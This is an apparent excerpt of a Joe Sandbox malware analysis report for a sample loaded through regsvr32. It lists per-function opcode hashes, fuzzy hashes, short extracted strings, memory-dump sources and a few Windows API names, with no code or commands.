                                                                                                                                      • Instruction ID: 3ee7e47d854a132278560872cba22db18b0762c6b33e49020313469b2ebed1ad
                                                                                                                                      • Opcode Fuzzy Hash: 32f12f089b8a2f529f06453d9d247e753f5514636137a2d7872eb14875660eb0
                                                                                                                                      • Instruction Fuzzy Hash: 5542F87154478C8BDBB8CF28C88D7DE7BE0FB54344F20461DE9AA8A261DBB49685CF41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: &lz2$'~W$<x<
                                                                                                                                      • API String ID: 0-2268522332
                                                                                                                                      • Opcode ID: d353bb3380a978666a479ee450a37b931469c1cc25af52acd29372fd61dce81c
                                                                                                                                      • Instruction ID: 36e71a14450f7168630c03d0025ff7d4b6ed06a40f4a953d8196177a15a51c97
                                                                                                                                      • Opcode Fuzzy Hash: d353bb3380a978666a479ee450a37b931469c1cc25af52acd29372fd61dce81c
                                                                                                                                      • Instruction Fuzzy Hash: 47E10574A14B0C8BDB69DFB8D04A6CDBBF2FB54344F20411DE80AAB292D7B49519CF85
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: $$T]0$ba^2
                                                                                                                                      • API String ID: 0-1276948933
                                                                                                                                      • Opcode ID: 50dab8274baf4b038fc4b99f186c2c7516c76bbdb2714b9ce32fb6facc3b6c7a
                                                                                                                                      • Instruction ID: eef8b44dd2583dc88dd368a4c81b8d58a3d6fa2c6a2b719c97d70d037daa09dd
                                                                                                                                      • Opcode Fuzzy Hash: 50dab8274baf4b038fc4b99f186c2c7516c76bbdb2714b9ce32fb6facc3b6c7a
                                                                                                                                      • Instruction Fuzzy Hash: 1CD11470510748DBCB99CF24C88AADD7FB1FB483A8FA42219FD06A7260C775D984CB85
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 6w5*$EDO$V
                                                                                                                                      • API String ID: 0-1640223502
                                                                                                                                      • Opcode ID: 944acd662e311639990576df567dfaf1aeae203cd7960374855798ea7e62004e
                                                                                                                                      • Instruction ID: 2aad62a72125add12bf3ce521e9508149cfd3cbf44ea5784fb3c25a9d2cdfef8
                                                                                                                                      • Opcode Fuzzy Hash: 944acd662e311639990576df567dfaf1aeae203cd7960374855798ea7e62004e
                                                                                                                                      • Instruction Fuzzy Hash: 07B1E67160560ECFCB88DF28C5866DE3BE0FB48318F41422AF90AA7354D774DA68CB85
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: Y()$i_"o$|Y
                                                                                                                                      • API String ID: 0-942011364
                                                                                                                                      • Opcode ID: 99e19844c70b9c0f3275fee4d9e8598d8799ff7d5c60b779fef480da3ab0ff5c
                                                                                                                                      • Instruction ID: 0f698cdcb9f5af38e2ff44253ec0ac71ef144d8643f40abc7fb7ff20982184b6
                                                                                                                                      • Opcode Fuzzy Hash: 99e19844c70b9c0f3275fee4d9e8598d8799ff7d5c60b779fef480da3ab0ff5c
                                                                                                                                      • Instruction Fuzzy Hash: 5AC1F7706083889FDBBEDF28C8857CA7BA9FB46708F504519EDC98E254DB745744CB42
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: O)$,G$-
                                                                                                                                      • API String ID: 0-23008916
                                                                                                                                      • Opcode ID: 382f6eb2118395d632dba3a2cf122cd3a475215dc83456f13dd86c7c3519a1e5
                                                                                                                                      • Instruction ID: 8302e34eee3504d26b36c965fbed976e69713b67a0f5c478fb5ffa9ec871fbb1
                                                                                                                                      • Opcode Fuzzy Hash: 382f6eb2118395d632dba3a2cf122cd3a475215dc83456f13dd86c7c3519a1e5
                                                                                                                                      • Instruction Fuzzy Hash: 6E81F7705106499BCF88DF28C8D6ADD7FB1FB483A8F956219FD0AA6250C774D885CB84
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: ;U[$L$Q#
                                                                                                                                      • API String ID: 0-2933747092
                                                                                                                                      • Opcode ID: 48c80cf55519f04e9394a4cd7563c786fdb29e452e8ba8fdd2d4b1674bf817ce
                                                                                                                                      • Instruction ID: c6ef39cbec2f0f72f24e8f037401308b0178ea645a608ff4f3f67d7bb634a9bb
                                                                                                                                      • Opcode Fuzzy Hash: 48c80cf55519f04e9394a4cd7563c786fdb29e452e8ba8fdd2d4b1674bf817ce
                                                                                                                                      • Instruction Fuzzy Hash: 0B614E70A0870CAFDB48DF94C14AADDBBF2FB54344F0081A9E806AB251D7B59B59CB85
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 5($<:*$qwX
                                                                                                                                      • API String ID: 0-3944236288
                                                                                                                                      • Opcode ID: 3ff6daddd3fc5570497b4afa6ac41a8054238f95a4c1d79c70cc8b829639e233
                                                                                                                                      • Instruction ID: 7f83292775578326f1885df61e48a3f2c5c3ff73894a37d4b388f2926162ec41
                                                                                                                                      • Opcode Fuzzy Hash: 3ff6daddd3fc5570497b4afa6ac41a8054238f95a4c1d79c70cc8b829639e233
                                                                                                                                      • Instruction Fuzzy Hash: 5B71067015878CDBEBBADF24C8897DD3BB0FB49344F90861AE84E8A250CF74574A9B41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 79&$s`~$v;
                                                                                                                                      • API String ID: 0-3844292866
                                                                                                                                      • Opcode ID: beca5e7b89ed182e00fd219d55149b62bdd99575566975f419d1c5ca8939f9e6
                                                                                                                                      • Instruction ID: c39f2861ae99e8b3f2b4a79ea52bf03a0f7a6e48d35fb935a0be7420e121cddb
                                                                                                                                      • Opcode Fuzzy Hash: beca5e7b89ed182e00fd219d55149b62bdd99575566975f419d1c5ca8939f9e6
                                                                                                                                      • Instruction Fuzzy Hash: 9B61397110478CAFDBFA9E58CC85BDD37A0FB48348F508229E9098B290DF749B4D9B46
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: wQ_$1_$ac
                                                                                                                                      • API String ID: 0-1037425278
                                                                                                                                      • Opcode ID: 943c7c2c61714b72029a8fd813d6c42c5c92d180aed6d879ae2838ea4b2e708e
                                                                                                                                      • Instruction ID: 5ab913ef515fd25bf7fc04ce61f78e9cde1e7d2fd73709943c0f3a5cbb59c84a
                                                                                                                                      • Opcode Fuzzy Hash: 943c7c2c61714b72029a8fd813d6c42c5c92d180aed6d879ae2838ea4b2e708e
                                                                                                                                      • Instruction Fuzzy Hash: 1D612B7010978C8BDBF8CF54DC997EA3BA6FB54345F208519E84E8A270DB74968CCB42
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: )K$U|$|1-
                                                                                                                                      • API String ID: 0-2543966960
                                                                                                                                      • Opcode ID: 5f28dff232c1c58b23d465856644a80aed22efa063cacd8378c131e5813de89a
                                                                                                                                      • Instruction ID: 8eb6a9a016547b1518e90ac2546dd564535e4ecbba9ac8d240a0a1c3e9042cf5
                                                                                                                                      • Opcode Fuzzy Hash: 5f28dff232c1c58b23d465856644a80aed22efa063cacd8378c131e5813de89a
                                                                                                                                      • Instruction Fuzzy Hash: 1151D57160438CAFDBF6CE64D8857CA37A0AB06354F608129A89D8A291DBB4578DCB02
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 6|$6`d$H~z
                                                                                                                                      • API String ID: 0-1702722476
                                                                                                                                      • Opcode ID: 6487df39d46446a395b722702bbc9accbfbbf10f6bdf8a05bf21e92dd4d708c3
                                                                                                                                      • Instruction ID: dff368548e7284a50638b46c1e9eca52edd1bdea535486c94ebb7356abcac70e
                                                                                                                                      • Opcode Fuzzy Hash: 6487df39d46446a395b722702bbc9accbfbbf10f6bdf8a05bf21e92dd4d708c3
                                                                                                                                      • Instruction Fuzzy Hash: C351F37190074DDFCF48DFA4D98A5DEBBB0FB48308F118659E89AA7260C7B89A44CF45
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: d~$`5$t>
                                                                                                                                      • API String ID: 0-1282322184
                                                                                                                                      • Opcode ID: 5ab2e5105061d0cdd7dd2083328b31dc67734e2d6c9a8d2650bd0306db7847c6
                                                                                                                                      • Instruction ID: 2b9aad7a7c3990d0f54026c4e2bc5a00c5a3c031faa8fbf8ed0394cc09118e70
                                                                                                                                      • Opcode Fuzzy Hash: 5ab2e5105061d0cdd7dd2083328b31dc67734e2d6c9a8d2650bd0306db7847c6
                                                                                                                                      • Instruction Fuzzy Hash: 9141B2B190078ECBCF48DFA8C88A1DE7BB0FB58358F104A19E965A6250D3B49664CF84
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: #St$JYr$hmn
                                                                                                                                      • API String ID: 0-1556749129
                                                                                                                                      • Opcode ID: 8c5881788024da3e2945e5a9e10c631b66cff36ab1256063138a18bf82cfdc40
                                                                                                                                      • Instruction ID: 771f7f328e054501a5ac5c786693eba7885e85f29817745d48b7f08549072e32
                                                                                                                                      • Opcode Fuzzy Hash: 8c5881788024da3e2945e5a9e10c631b66cff36ab1256063138a18bf82cfdc40
                                                                                                                                      • Instruction Fuzzy Hash: 9141A2B590038E8FCF48CF68C9865DF7BB0FB58358F104A19E866A6250D3B8D665CF85
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: TGA$K$W}
                                                                                                                                      • API String ID: 0-588348707
                                                                                                                                      • Opcode ID: 6f9a2f9587d8e5dd3523940eb2aee6104e1c9ad2b61c16d7289d24ecd03a1c44
                                                                                                                                      • Instruction ID: 925d7415f36b0b7642ffd9188936a5d9ffa2c4cac62ef92b2c466baf2dc1674c
                                                                                                                                      • Opcode Fuzzy Hash: 6f9a2f9587d8e5dd3523940eb2aee6104e1c9ad2b61c16d7289d24ecd03a1c44
                                                                                                                                      • Instruction Fuzzy Hash: E041C2B480038E8FCB88DF68D8865DE7BB0FB58358F10461DF82AA6254D3B49664CF95
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: :1,$@H${C=
                                                                                                                                      • API String ID: 0-2737386091
                                                                                                                                      • Opcode ID: 644fe5c2a8aa80c3bc0818b82038798635fbfb77325ece216352586eb067b324
                                                                                                                                      • Instruction ID: ceb57f34bb3f34c1ea772447f295c080a735f780389ac7edd693abfe49cb3e58
                                                                                                                                      • Opcode Fuzzy Hash: 644fe5c2a8aa80c3bc0818b82038798635fbfb77325ece216352586eb067b324
                                                                                                                                      • Instruction Fuzzy Hash: B641E6B090078E8FCF48DF68C98A5DE7BB0FB58348F104A1DE856A6250D3B4D665CF95
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: prP$q<C$uL
                                                                                                                                      • API String ID: 0-1414207395
                                                                                                                                      • Opcode ID: 2ae9b2111e30b1203ae6799d8d29bbb45b968934521661f86bb08c7d67e7e9b2
                                                                                                                                      • Instruction ID: cc3a3a13117e67edb5dc9e3fadb8c1066889dae633948d8cd9104a976a047d4b
                                                                                                                                      • Opcode Fuzzy Hash: 2ae9b2111e30b1203ae6799d8d29bbb45b968934521661f86bb08c7d67e7e9b2
                                                                                                                                      • Instruction Fuzzy Hash: 1031B1B180434E9FCB48DF68C88A5DE7FB0FB58358F10961DE85AA6260D3789695CFC4
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: :00D$Kl$(R'
                                                                                                                                      • API String ID: 0-3661897330
                                                                                                                                      • Opcode ID: 85d3200e76e47dbb67993755bb0ce797b19f94abe7489bd39968e35e8c3a1c76
                                                                                                                                      • Instruction ID: 113703a4c5f13be184801d5493027e38acd6d1afb500234bb699672912ccf9eb
                                                                                                                                      • Opcode Fuzzy Hash: 85d3200e76e47dbb67993755bb0ce797b19f94abe7489bd39968e35e8c3a1c76
                                                                                                                                      • Instruction Fuzzy Hash: CA216F74618B848BD74CDF28C46551EBBE1BB8C718F440B1DF4CAAA354D778D6058B4A
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • _getptd.LIBCMT ref: 00007FFFE231597E
                                                                                                                                        • Part of subcall function 00007FFFE2316550: RtlCaptureContext.KERNEL32 ref: 00007FFFE231658F
                                                                                                                                        • Part of subcall function 00007FFFE2316550: IsDebuggerPresent.KERNEL32 ref: 00007FFFE231662D
                                                                                                                                        • Part of subcall function 00007FFFE2316550: SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFFE2316637
                                                                                                                                        • Part of subcall function 00007FFFE2316550: UnhandledExceptionFilter.KERNEL32 ref: 00007FFFE2316642
                                                                                                                                        • Part of subcall function 00007FFFE2316550: GetCurrentProcess.KERNEL32 ref: 00007FFFE2316658
                                                                                                                                        • Part of subcall function 00007FFFE2316550: TerminateProcess.KERNEL32 ref: 00007FFFE2316666
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267295982.00007FFFE22D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFE22D0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.267290170.00007FFFE22D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267388686.00007FFFE2322000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267426705.00007FFFE2326000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267483076.00007FFFE2329000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7fffe22d0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate_errno_getptd
                                                                                                                                      • String ID: C
                                                                                                                                      • API String ID: 1583075380-1037565863
                                                                                                                                      • Opcode ID: 10b8f8e64b2f2c6b57eebdc268e2529a4342badfac4ad9c6369cf06c32040822
                                                                                                                                      • Instruction ID: e42e786e9d5c75b81f4f317a19b1984b8ee4394bda8405bcdf3a1020c997d69d
                                                                                                                                      • Opcode Fuzzy Hash: 10b8f8e64b2f2c6b57eebdc268e2529a4342badfac4ad9c6369cf06c32040822
                                                                                                                                      • Instruction Fuzzy Hash: 2251B652E1868249FB609B21A4517BB53D0FBA4B80F4481B3DE4DE7B89EEBCD015CB02
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267295982.00007FFFE22D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFE22D0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.267290170.00007FFFE22D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267388686.00007FFFE2322000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267426705.00007FFFE2326000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267483076.00007FFFE2329000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7fffe22d0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InfoLocale_getptd
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3731964398-0
                                                                                                                                      • Opcode ID: 3ee99f9ceacccca0b475531418f3f0bad8631950249c9606f8709888dfed1ca9
                                                                                                                                      • Instruction ID: f1b02b5154a1a423709efadd0ea85a1edb4d8e0c76a9a9b8462738f379dd9d0b
                                                                                                                                      • Opcode Fuzzy Hash: 3ee99f9ceacccca0b475531418f3f0bad8631950249c9606f8709888dfed1ca9
                                                                                                                                      • Instruction Fuzzy Hash: 45218F32F086828EEB689B25D9053E973D0FBA8745F004172C71DD7685EFBCE4648B02
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267295982.00007FFFE22D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFE22D0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.267290170.00007FFFE22D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267388686.00007FFFE2322000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267426705.00007FFFE2326000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267483076.00007FFFE2329000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7fffe22d0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InfoLocale_getptd
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3731964398-0
                                                                                                                                      • Opcode ID: d1cd7d40a2314de2c6ade98052514a7069188fc7bc8d66beba22a864349849c0
                                                                                                                                      • Instruction ID: bb65eb103c14b0b2b39a44ce77dc6a20f40e8da4f30e89ffe19ef16afefca8c0
                                                                                                                                      • Opcode Fuzzy Hash: d1cd7d40a2314de2c6ade98052514a7069188fc7bc8d66beba22a864349849c0
                                                                                                                                      • Instruction Fuzzy Hash: B821BE32F08A918AEB28CB20E8453E973E0FB98B80F404576DA5D97354EF7CE555CB02
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: $$Y}
                                                                                                                                      • API String ID: 0-941771097
                                                                                                                                      • Opcode ID: ccf5b1dce74faba3fe2a090267a66303c79afc7ef0f7a8852e8ee526979540e5
                                                                                                                                      • Instruction ID: b5fbb9b8d69d65623167db00d7c984f611664f17b2ba8ffe1295fa2c65075a94
                                                                                                                                      • Opcode Fuzzy Hash: ccf5b1dce74faba3fe2a090267a66303c79afc7ef0f7a8852e8ee526979540e5
                                                                                                                                      • Instruction Fuzzy Hash: BFD11771D0475C8BDBA9CFA4C58A6DDBBB0FF48304F14812ED406AA664DBB4A94ACF41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 7;}~$?C
                                                                                                                                      • API String ID: 0-2633536567
                                                                                                                                      • Opcode ID: 9e9477893eee9c26855422b11b358c2b9c7e89ea64d6e27a9c9a45e4b3e49bc9
                                                                                                                                      • Instruction ID: 4ff8dde17651611a765cac66b1fbb421dc2d9ab68fb3aea537ff971927bbf4a2
                                                                                                                                      • Opcode Fuzzy Hash: 9e9477893eee9c26855422b11b358c2b9c7e89ea64d6e27a9c9a45e4b3e49bc9
                                                                                                                                      • Instruction Fuzzy Hash: 78D1157090074CEBCB98DF28C8CA6DD7FA0FF443A4FA06119FA5696250D7719989CB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 5"*$Wu
                                                                                                                                      • API String ID: 0-3407213400
                                                                                                                                      • Opcode ID: 590a19696181e1204ae7455af11f8a1d001dcd1a3fed74675f5c17178e0ac61d
                                                                                                                                      • Instruction ID: 3c96fdf1381a0958c8520d7d71fe6f2c88625533ee613de06fa48a87f48c4e54
                                                                                                                                      • Opcode Fuzzy Hash: 590a19696181e1204ae7455af11f8a1d001dcd1a3fed74675f5c17178e0ac61d
                                                                                                                                      • Instruction Fuzzy Hash: C5D1347150160CDBCBA9DF38C0896D93BE1FF68314F606229FC26962A6C770D998CB45
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: F/|$]M
                                                                                                                                      • API String ID: 0-4182351379
                                                                                                                                      • Opcode ID: 6ca5dc36d9275e72bb52b2201a87e4efd5e3077112f043bed35ba482a866e2ca
                                                                                                                                      • Instruction ID: a7a3ffa63f459c2793369717af269d13be5e973408dad35b7fec4159c22d1286
                                                                                                                                      • Opcode Fuzzy Hash: 6ca5dc36d9275e72bb52b2201a87e4efd5e3077112f043bed35ba482a866e2ca
                                                                                                                                      • Instruction Fuzzy Hash: 93C1FC7590574CCFDBAACF28C4896DA3BE4FF18348F104129FC1A96262C778E959CB46
